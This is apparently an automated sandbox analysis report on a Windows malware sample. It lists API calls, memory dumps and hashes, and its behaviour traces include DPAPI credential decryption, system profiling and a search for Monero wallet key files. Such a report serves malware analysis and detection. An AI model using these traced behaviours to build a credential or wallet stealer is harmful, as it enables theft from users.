                              Function 00939AC0 Relevance: 6.1, APIs: 4, Instructions: 55encryptionmemoryCOMMON
                              Download Yara Rule
                              APIs
                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00934EEE,00000000,00000000), ref: 00939AEF
                              • LocalAlloc.KERNEL32(00000040,?,?,?,00934EEE,00000000,?), ref: 00939B01
                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00934EEE,00000000,00000000), ref: 00939B2A
                              • LocalFree.KERNEL32(?,?,?,?,00934EEE,00000000,?), ref: 00939B3F
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: BinaryCryptLocalString$AllocFree
                              • String ID:
                              • API String ID: 4291131564-0
                              • Opcode ID: f5d03cb5e82c999d37bb1abdc8ca510c52d1e89205be04f7c72497b58ed44870
                              • Instruction ID: ada1a477b33d44e9f096b0df03390d0c71fe35856911786cf54b31b79b691ccd
                              • Opcode Fuzzy Hash: f5d03cb5e82c999d37bb1abdc8ca510c52d1e89205be04f7c72497b58ed44870
                              • Instruction Fuzzy Hash: 7611A4B4240208EFEB10CF64DC95FAAB7B9FB89700F208058F9199B390C7B5A941CB51
                              Function 00947980 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00950E00,00000000,?), ref: 009479B0
                              • RtlAllocateHeap.NTDLL(00000000), ref: 009479B7
                              • GetLocalTime.KERNEL32(?,?,?,?,?,00950E00,00000000,?), ref: 009479C4
                              • wsprintfA.USER32 ref: 009479F3
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateLocalProcessTimewsprintf
                              • String ID:
                              • API String ID: 377395780-0
                              • Opcode ID: 83085632a9be067845b6fedfaed6945d02e0287bac3202655499e0543bd91c6c
                              • Instruction ID: b6baafa423281266dd58c911bb491aeb1bebb53e08ec9c32764e1daf1d692b32
                              • Opcode Fuzzy Hash: 83085632a9be067845b6fedfaed6945d02e0287bac3202655499e0543bd91c6c
                              • Instruction Fuzzy Hash: B31115B2904118AACB149FC9DD45BBEB7F8EB88B11F14425AF605A2280E6395940CBB1
                              Function 00947A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,010FDD20,00000000,?,00950E10,00000000,?,00000000,00000000), ref: 00947A63
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00947A6A
                              • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,010FDD20,00000000,?,00950E10,00000000,?,00000000,00000000,?), ref: 00947A7D
                              • wsprintfA.USER32 ref: 00947AB7
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                              • String ID:
                              • API String ID: 3317088062-0
                              • Opcode ID: 8f57ae2e6f0dbd163a362fc7fecdea3db1138316b9f3a407beb6b05b16473d8c
                              • Instruction ID: 50b118da1bf3849e81e9c77c857eb64ea3b0c36f2a1756ed2730bec4c5bc88f7
                              • Opcode Fuzzy Hash: 8f57ae2e6f0dbd163a362fc7fecdea3db1138316b9f3a407beb6b05b16473d8c
                              • Instruction Fuzzy Hash: 40118EB1A45218EBEB20CB94DC49FA9B778FB44721F10479AE90A932C0DB745A80CF52
                              Function 00943720 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON
                              Download Yara Rule
                              APIs
                              • CoCreateInstance.COMBASE(0094E118,00000000,00000001,0094E108,00000000), ref: 00943758
                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 009437B0
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ByteCharCreateInstanceMultiWide
                              • String ID:
                              • API String ID: 123533781-0
                              • Opcode ID: f2cd8cf9135928e127acb0a2a1e0a2bffe0319c048805744080278c4cefa9e69
                              • Instruction ID: 6df142c39ae1bf5fd97cedae1a7830ff1e119302c075277727e8e86e7826a7a0
                              • Opcode Fuzzy Hash: f2cd8cf9135928e127acb0a2a1e0a2bffe0319c048805744080278c4cefa9e69
                              • Instruction Fuzzy Hash: EA41F770A40A289FDB24DB58CC94F9BB7B4BB88702F4081D8E608A7290E7716EC5CF50
                              Function 00939B60 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON
                              Download Yara Rule
                              APIs
                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00939B84
                              • LocalAlloc.KERNEL32(00000040,00000000), ref: 00939BA3
                              • LocalFree.KERNEL32(?), ref: 00939BD3
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Local$AllocCryptDataFreeUnprotect
                              • String ID:
                              • API String ID: 2068576380-0
                              • Opcode ID: e8f5864e8ce81e3c67c58d0b37cf280dd8987288710cf707516f8777fd57d84e
                              • Instruction ID: e12fd5be5f8dcc40cc8ab34447dca716cd059ff66cd2bb662ef8233937b43672
                              • Opcode Fuzzy Hash: e8f5864e8ce81e3c67c58d0b37cf280dd8987288710cf707516f8777fd57d84e
                              • Instruction Fuzzy Hash: 2611C9B8A00209EFDB04DF94D985AAEB7B9FF88300F104598E915A7394D774AE50CFA1
                              Function 00CF966E Relevance: 4.1, Strings: 2, Instructions: 1615COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: %.$%.
                              • API String ID: 0-3989853728
                              • Opcode ID: dd1547d14f1aa7ad465938e468224f40e2399520c74fd7f27300f18de8c1aa92
                              • Instruction ID: 0591a0c10303cbcb223566466bc0596e364f9c0b3b24ec136cbeb71d8f27bf41
                              • Opcode Fuzzy Hash: dd1547d14f1aa7ad465938e468224f40e2399520c74fd7f27300f18de8c1aa92
                              • Instruction Fuzzy Hash: 69B2D2F360C6009FE304AE2DEC8567AB7E9EF94720F1A893DE6C5C3744E63598118697
                              Function 00C6825A Relevance: 4.0, Strings: 3, Instructions: 216COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 3eWn$IW~w$IW~w
                              • API String ID: 0-1526076383
                              • Opcode ID: 79c27dd00e6467385fe05ac0cc3f2dd4a9b525e106f21bef8bda2af421a5e8cf
                              • Instruction ID: 1b96b1ad1586a59acdcf1708d3b343c8eb664c733a25809a3f05c3be5e031859
                              • Opcode Fuzzy Hash: 79c27dd00e6467385fe05ac0cc3f2dd4a9b525e106f21bef8bda2af421a5e8cf
                              • Instruction Fuzzy Hash: 9E612AF3A087009FE3056E2DECC576ABBE5EB98320F1A453DEAC4C3740E63598158687
                              Function 00CF1678 Relevance: 3.6, Strings: 2, Instructions: 1108COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: NyB_$t=7@
                              • API String ID: 0-2004791706
                              • Opcode ID: fb39e0a886786b86170a539566d6e662c64ed56712c5511bb31ff788f6321552
                              • Instruction ID: dddc5f0b2cf15f6c86afc46cb48ba7bdd0b0f8d5d8c27724a0b659889d8fd0d5
                              • Opcode Fuzzy Hash: fb39e0a886786b86170a539566d6e662c64ed56712c5511bb31ff788f6321552
                              • Instruction Fuzzy Hash: 3672B2F350C2049FE304AF29EC8567AFBE9EF94720F1A492DE6C4C7744E63598418A97
                              Function 00C03C57 Relevance: 2.7, Strings: 2, Instructions: 207COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: ;r $pzo
                              • API String ID: 0-4062491179
                              • Opcode ID: 6f641121be52fefb4dff9582d2aca68fd8e838ca96bc1b41f5d4bc77e29a12ec
                              • Instruction ID: 553e4d4881b5c13f7185b77886db7421fde9a944c03075b05e69dba5ffb27cb7
                              • Opcode Fuzzy Hash: 6f641121be52fefb4dff9582d2aca68fd8e838ca96bc1b41f5d4bc77e29a12ec
                              • Instruction Fuzzy Hash: 8B5139F390C2149BE3187E7CDC0577ABBD9EBA4320F1A463DEAC5D3784E93949148686
                              Function 0093F68A Relevance: 1.6, APIs: 1, Instructions: 63fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                                • Part of subcall function 0094A920: lstrcpy.KERNEL32(00000000,?), ref: 0094A972
                                • Part of subcall function 0094A920: lstrcat.KERNEL32(00000000), ref: 0094A982
                                • Part of subcall function 0094A9B0: lstrlen.KERNEL32(?,010F8A98,?,\Monero\wallet.keys,00950E17), ref: 0094A9C5
                                • Part of subcall function 0094A9B0: lstrcpy.KERNEL32(00000000), ref: 0094AA04
                                • Part of subcall function 0094A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0094AA12
                                • Part of subcall function 0094A8A0: lstrcpy.KERNEL32(?,00950E17), ref: 0094A905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,009515B8,00950D96), ref: 0093F71E
                              • StrCmpCA.SHLWAPI(?,009515BC), ref: 0093F76F
                              • StrCmpCA.SHLWAPI(?,009515C0), ref: 0093F785
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0093FAB1
                              • FindClose.KERNEL32(000000FF), ref: 0093FAC3
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID:
                              • API String ID: 3334442632-0
                              • Opcode ID: 1b5a735acfcbc46df1e37348067b782269bf0daed4f33b956026373881603108
                              • Instruction ID: de71c7931a887cc0c4d4e3b569b4ce82406a673e18bab5b0b4ad860d1d09854b
                              • Opcode Fuzzy Hash: 1b5a735acfcbc46df1e37348067b782269bf0daed4f33b956026373881603108
                              • Instruction Fuzzy Hash: 0711813184410DABEB24EBA0DC55FED7378EF90304F4146A9A51A97592EF302B4ACB92
                              Function 00CD2567 Relevance: 1.4, Strings: 1, Instructions: 196COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: c,L%
                              • API String ID: 0-776531003
                              • Opcode ID: f59550e1114f2fe89720c3555d580054c7c6cf9b0de58fb0a052c77801382a96
                              • Instruction ID: 36313cfddbcf492c8059afa5cc0cf011cd3156eee67ae44dd226578434f7043c
                              • Opcode Fuzzy Hash: f59550e1114f2fe89720c3555d580054c7c6cf9b0de58fb0a052c77801382a96
                              • Instruction Fuzzy Hash: D35101B390C2049FD348BF28EC8576ABBE5EB94320F16493DE9C9C7744E63599408B87
